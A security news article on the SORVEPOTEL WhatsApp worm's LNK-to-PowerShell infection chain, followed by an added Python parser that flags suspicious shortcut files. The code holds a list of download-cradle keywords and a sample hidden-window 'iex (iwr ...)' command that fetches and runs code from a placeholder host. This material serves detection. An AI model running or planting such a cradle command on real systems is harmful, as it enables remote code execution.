Self-propagating SORVEPOTEL worm targets WhatsApp users

Trend Micro analysts have warned that Brazilian WhatsApp users are being targeted by a new self-propagating malware, SORVEPOTEL, that infects Windows systems.

According to experts, the attack is designed with an emphasis on speed and scale of propagation rather than data theft or extortion. SORVEPOTEL spreads via plausible phishing messages with malicious ZIP archives disguised as receipts or health apps. Notably, the phishing attachments are intended to be opened on PCs, which suggests the attackers are more interested in corporate targets than ordinary users.

After the malicious attachment is opened, the malware automatically spreads via WhatsApp Web on the PC: the infected account sends ZIP files to all contacts and groups, leading to widespread spam and often resulting in the victim’s account being suspended for violating WhatsApp’s rules.

Trend Micro notes that, at the time of writing, there are no indications that the operators of this campaign are using their access to infected systems to steal data or encrypt files.

Most SORVEPOTEL infections (457 out of 477) were recorded in Brazil. Government agencies are most often affected, as well as organizations in the public services, manufacturing, technology, education, and construction sectors.

The malicious ZIP contains a Windows shortcut (LNK) that the victim is lured into launching. When it runs, a PowerShell script is executed silently, downloading the malware's main module from an external server (e.g., sorvetenopoate[.]com).

The downloaded module is a batch script responsible for persistence: it copies itself to the Windows Startup folder so it launches after the system starts. In addition, the script executes a PowerShell command that contacts the attackers’ command server for further instructions or additional components.
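The chain above starts with a shortcut file whose target is PowerShell and whose arguments carry a hidden-window download cradle, so a useful triage step is to parse LNK files pulled out of suspicious ZIP attachments and read those fields without ever executing them. The following is an added example written for this page, not Trend Micro's tooling or a SORVEPOTEL artifact: it implements a minimal MS-SHLLINK parser, a heuristic that flags PowerShell targets launched with cradle-style arguments or a minimized window, and a builder that constructs a sample shortcut in memory. The keyword list, the field names and the sample URL (example.invalid) are the author's assumptions.

```python
"""Minimal .lnk (MS-SHLLINK) parser for triaging shortcut files from ZIP lures.

Added example, not from the original article. The heuristic keywords and the
sample shortcut (built by build_lnk) are assumptions, not a real SORVEPOTEL LNK.
"""
import struct

# LinkFlags bits (MS-SHLLINK 2.1.1) that matter for locating the string data.
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80

# CLSID 00021401-0000-0000-C000-000000000046 as stored on disk (little-endian).
LINK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
SW_SHOWMINNOACTIVE = 7  # ShowCommand value that keeps the console out of sight

# StringData blocks appear in this fixed order, each only if its flag is set.
STRING_FIELDS = [
    (HAS_NAME, "name"),
    (HAS_RELATIVE_PATH, "relative_path"),
    (HAS_WORKING_DIR, "working_dir"),
    (HAS_ARGUMENTS, "arguments"),
    (HAS_ICON_LOCATION, "icon_location"),
]

# Substrings typical of a download-and-execute cradle (assumed list, tune locally).
SUSPICIOUS_ARGS = ("-w hidden", "-windowstyle hidden", "-nop", "-ep bypass",
                   "downloadstring", "invoke-webrequest", "iwr ", "iex",
                   "invoke-expression", "frombase64string", "-enc")


def parse_lnk(data: bytes) -> dict:
    """Return ShowCommand plus the string fields of a shell link; never executes it."""
    if len(data) < 0x4C or struct.unpack_from("<I", data, 0)[0] != 0x4C:
        raise ValueError("not a shell link: bad HeaderSize")
    if data[4:20] != LINK_CLSID:
        raise ValueError("not a shell link: bad LinkCLSID")
    flags = struct.unpack_from("<I", data, 20)[0]
    show_command = struct.unpack_from("<I", data, 60)[0]
    pos = 0x4C
    if flags & HAS_LINK_TARGET_ID_LIST:          # skip IDList: 2-byte size + body
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                    # skip LinkInfo: size includes itself
        pos += struct.unpack_from("<I", data, pos)[0]
    unicode = bool(flags & IS_UNICODE)
    fields = {"show_command": show_command}
    for bit, name in STRING_FIELDS:
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, pos)[0]   # character count, no NUL
        pos += 2
        nbytes = count * 2 if unicode else count
        fields[name] = data[pos:pos + nbytes].decode("utf-16-le" if unicode else "cp1252")
        pos += nbytes
    return fields


def triage_lnk(data: bytes) -> dict:
    """Flag a shortcut that launches PowerShell with cradle arguments or a hidden window."""
    info = parse_lnk(data)
    target = (info.get("relative_path", "") + " " + info.get("working_dir", "")).lower()
    args = info.get("arguments", "").lower()
    powershell = "powershell" in target or "pwsh" in target or "powershell" in args
    hits = [k for k in SUSPICIOUS_ARGS if k in args]
    hidden = info["show_command"] == SW_SHOWMINNOACTIVE
    reasons = []
    if powershell and hits:
        reasons.append("PowerShell target with cradle keywords: " + ", ".join(hits))
    if powershell and hidden:
        reasons.append("PowerShell target with ShowCommand=SW_SHOWMINNOACTIVE")
    info["suspicious"] = bool(reasons)
    info["reasons"] = reasons
    return info


def build_lnk(relative_path: str, arguments: str, show_command: int = 1) -> bytes:
    """Construct a minimal shortcut with only RELATIVE_PATH and ARGUMENTS set (test data)."""
    flags = HAS_RELATIVE_PATH | HAS_ARGUMENTS | IS_UNICODE
    header = struct.pack("<I", 0x4C) + LINK_CLSID + struct.pack(
        "<IIQQQIIIHHII", flags, 0, 0, 0, 0, 0, 0, show_command, 0, 0, 0, 0)

    def enc(s: str) -> bytes:
        return struct.pack("<H", len(s)) + s.encode("utf-16-le")

    return header + enc(relative_path) + enc(arguments)


# Constructed samples: a cradle-style lure and a harmless document shortcut.
SAMPLE_LNK = build_lnk(
    r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    "-w hidden -nop -ep bypass -c \"iex (iwr 'https://example.invalid/stage')\"",
    show_command=SW_SHOWMINNOACTIVE,
)
BENIGN_LNK = build_lnk(r"..\Documents\receipt.pdf", "")

if __name__ == "__main__":
    for label, blob in (("lure", SAMPLE_LNK), ("benign", BENIGN_LNK)):
        print(label, triage_lnk(blob))
```

The parser deliberately skips the LinkTargetIDList and LinkInfo blocks by their declared sizes rather than interpreting them, since the string data after them already carries the target and arguments an analyst needs; on a real sample, pair the output with the hash of the downloaded stage and the contacted domain before writing a detection.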

Trend Micro concludes: the SORVEPOTEL example clearly shows that attackers are increasingly using popular communication platforms (such as WhatsApp) to spread malware quickly and at scale, with minimal user interaction.